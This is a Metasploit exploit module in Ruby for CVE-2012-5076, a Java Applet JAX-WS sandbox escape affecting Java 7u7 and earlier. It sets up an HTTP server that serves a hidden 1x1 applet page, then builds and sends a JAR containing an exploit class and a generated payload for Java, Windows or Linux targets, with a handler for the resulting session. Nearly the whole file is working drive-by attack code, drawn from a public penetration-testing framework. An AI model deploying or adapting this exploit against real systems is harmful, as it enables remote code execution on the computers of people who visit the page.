1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::HttpServer::HTML
10

11
  # include Msf::Exploit::Remote::BrowserAutopwn
12
  # autopwn_info({ :javascript => false })
13

14
  def initialize(info = {})
15
    super(
16
      update_info(
17
        info,
18
        'Name' => 'Java Applet JAX-WS Remote Code Execution',
19
        'Description' => %q{
20
          This module abuses the JAX-WS classes from a Java Applet to run arbitrary Java
21
          code outside of the sandbox as exploited in the wild in November of 2012. The
22
          vulnerability affects Java version 7u7 and earlier.
23
        },
24
        'License' => MSF_LICENSE,
25
        'Author' => [
26
          'Unknown', # Vulnerability Discovery
27
          'juan vazquez' # metasploit module
28
        ],
29
        'References' => [
30
          [ 'CVE', '2012-5076' ],
31
          [ 'OSVDB', '86363' ],
32
          [ 'BID', '56054' ],
33
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpuoct2012-1515924.html' ],
34
          [ 'URL', 'http://malware.dontneedcoffee.com/2012/11/cool-ek-hello-my-friend-cve-2012-5067.html' ],
35
          [ 'URL', 'http://blogs.technet.com/b/mmpc/archive/2012/11/15/a-technical-analysis-on-new-java-vulnerability-cve-2012-5076.aspx' ]
36
        ],
37
        'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
38
        'Targets' => [
39
          [
40
            'Generic (Java Payload)',
41
            {
42
              'Arch' => ARCH_JAVA
43
            }
44
          ],
45
          [
46
            'Windows Universal',
47
            {
48
              'Arch' => ARCH_X86,
49
              'Platform' => 'win'
50
            }
51
          ],
52
          [
53
            'Linux x86',
54
            {
55
              'Arch' => ARCH_X86,
56
              'Platform' => 'linux'
57
            }
58
          ]
59
        ],
60
        'DefaultTarget' => 0,
61
        'DisclosureDate' => '2012-10-16',
62
        'Notes' => {
63
          'Reliability' => UNKNOWN_RELIABILITY,
64
          'Stability' => UNKNOWN_STABILITY,
65
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
66
        }
67
      )
68
    )
69
  end
70

71
  def on_request_uri(cli, request)
72
    if !request.uri.match(/\.jar$/i)
73
      if !request.uri.match(%r{/$})
74
        send_redirect(cli, get_resource + '/', '')
75
        return
76
      end
77

78
      print_status("#{name} handling request")
79

80
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
81
      return
82
    end
83

84
    paths = [
85
      [ 'Exploit.class' ],
86
      [ 'MyPayload.class' ]
87
    ]
88

89
    p = regenerate_payload(cli)
90

91
    jar = p.encoded_jar
92

93
    paths.each do |path|
94
      1.upto(path.length - 1) do |idx|
95
        full = path[0, idx].join('/') + '/'
96
        if !(jar.entries.map { |e| e.name }.include?(full))
97
          jar.add_file(full, '')
98
        end
99
      end
100
      fd = File.open(File.join(Msf::Config.data_directory, 'exploits', 'cve-2012-5076', path), 'rb')
101
      data = fd.read(fd.stat.size)
102
      jar.add_file(path.join('/'), data)
103
      fd.close
104
    end
105

106
    print_status('Sending Applet.jar')
107
    send_response(cli, jar.pack, { 'Content-Type' => 'application/octet-stream' })
108

109
    handler(cli)
110
  end
111

112
  def generate_html
113
    jar_name = rand_text_alpha(rand(3..8)) + '.jar'
114
    html = '<html><head></head>'
115
    html += '<body>'
116
    html += "<applet archive=\"#{jar_name}\" code=\"Exploit.class\" width=\"1\" height=\"1\">"
117
    html += '</applet></body></html>'
118
    return html
119
  end
120
end
121

122